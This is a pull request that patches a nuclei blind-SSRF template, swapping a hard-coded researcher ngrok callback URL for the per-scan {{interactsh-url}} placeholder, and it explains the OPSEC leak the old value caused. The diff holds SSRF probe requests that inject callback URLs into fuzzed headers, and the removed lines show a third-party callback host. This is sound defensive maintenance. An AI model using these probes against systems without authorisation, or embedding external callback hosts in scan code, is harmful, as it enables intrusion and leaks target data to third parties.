### PR TITLE
audit: remove hardcoded researcher OOB callback subdomains

### DIFF
--- a/blind_ssrf.yaml
+++ b/blind_ssrf.yaml
@@ -13,19 +13,19 @@ requests:
         GET / HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
-        §header§: https://9a7d-183-82-25-4.ngrok.io
+        §header§: https://{{interactsh-url}}
          
       - |
         POST / HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
-        §header§: https://9a7d-183-82-25-4.ngrok.io
+        §header§: https://{{interactsh-url}}
 
       - |  
         PUT / HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
-        §header§: https://9a7d-183-82-25-4.ngrok.io
+        §header§: https://{{interactsh-url}}
 
     payloads:
       header: helpers/payloads/request-headers.txt


### PR DESCRIPTION
A recent static-analysis audit of the public nuclei-template ecosystem identified templates in this repository that hard-code a third-party out-of-band (OOB) callback subdomain — researcher-controlled `burpcollaborator.net`, `dnslog.cn`, or `ngrok.io` endpoints — into the exploit payload, rather than using nuclei's `{{interactsh-url}}` per-scan placeholder.

**Impact.** Every time a user successfully exploits a vulnerable target with one of these templates, the target's outbound DNS/HTTP signal reaches the third party who controls the hard-coded subdomain — silently telling that party which target was scanned and when. It is not a scanner-host compromise, but it is an OPSEC leak that propagates indefinitely with every byte-identical copy.

**This PR's changes:**

Replace the hard-coded URL with `{{interactsh-url}}`:

- `blind_ssrf.yaml` — `https://9a7d-183-82-25-4.ngrok.io` -> `https://{{interactsh-url}}`

These templates appear in this repository as byte-identical copies of upstream PoCs not authored here — the same patch is needed in many other community repositories.

A companion issue has been opened with the full file list and audit context.